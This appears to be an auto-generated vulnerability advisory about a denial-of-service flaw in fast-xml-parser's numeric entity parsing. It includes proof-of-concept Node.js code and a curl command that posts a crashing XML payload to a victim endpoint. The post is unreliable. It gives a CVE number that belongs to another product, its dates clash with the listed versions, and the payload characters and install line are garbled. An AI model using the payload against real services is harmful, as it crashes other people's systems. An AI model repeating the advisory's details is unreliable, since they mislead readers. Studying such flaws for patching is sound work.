fast-xml-parser, XML Entity RangeError Denial of Service, CVE-2023-5363 (Critical)

Listen to this Post

The vulnerability exists in the numeric entity parsing logic of the fast-xml-parser library. In the `OrderedObjParser.js` file, the regular expressions for decimal (&([0-9]{1,7});) and hexadecimal (&x([0-9a-fA-F]{1,6});) entities capture numeric strings up to 7 and 6 characters long respectively, allowing values far beyond the maximum valid Unicode code point of 0x10FFFF (1,114,111). The captured string is passed to String.fromCodePoint(). This JavaScript method throws a `RangeError` for invalid code points. The library’s `replaceEntitiesValue()` function lacks a try-catch block around this replacement operation. When a malicious XML payload contains an out-of-range entity like `�` (decimal 9999999) or `�` (hex 0xFFFFFF), the uncaught `RangeError` exception propagates up, crashing the Node.js process and causing a Denial of Service.
Platform: fast-xml-parser
Version: <= 5.3.3
Vulnerability: Uncaught RangeError
Severity: Critical
date: 2024-05-17

Prediction: Patch 2024-05-31

What Undercode Say:

npm init -y
npm install [email protected]
const { XMLParser } = require('fast-xml-parser');
const parser = new XMLParser({ processEntities: true });
const maliciousXML = '<?xml version="1.0"?><root>�</root>';
parser.parse(maliciousXML);
curl -X POST -d '<?xml version="1.0"?><root>�</root>' http://victim/parse

How Exploit:

Craft XML payload containing decimal `�` or hex `�` entity. Send via HTTP POST to endpoint using vulnerable parser. Process crashes immediately.

Protection from this CVE:

Update to >=5.3.4. Implement input validation. Use try-catch wrapper. Disable entity parsing.

Impact:

Application crash, Denial of Service, service disruption, manual restart required.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top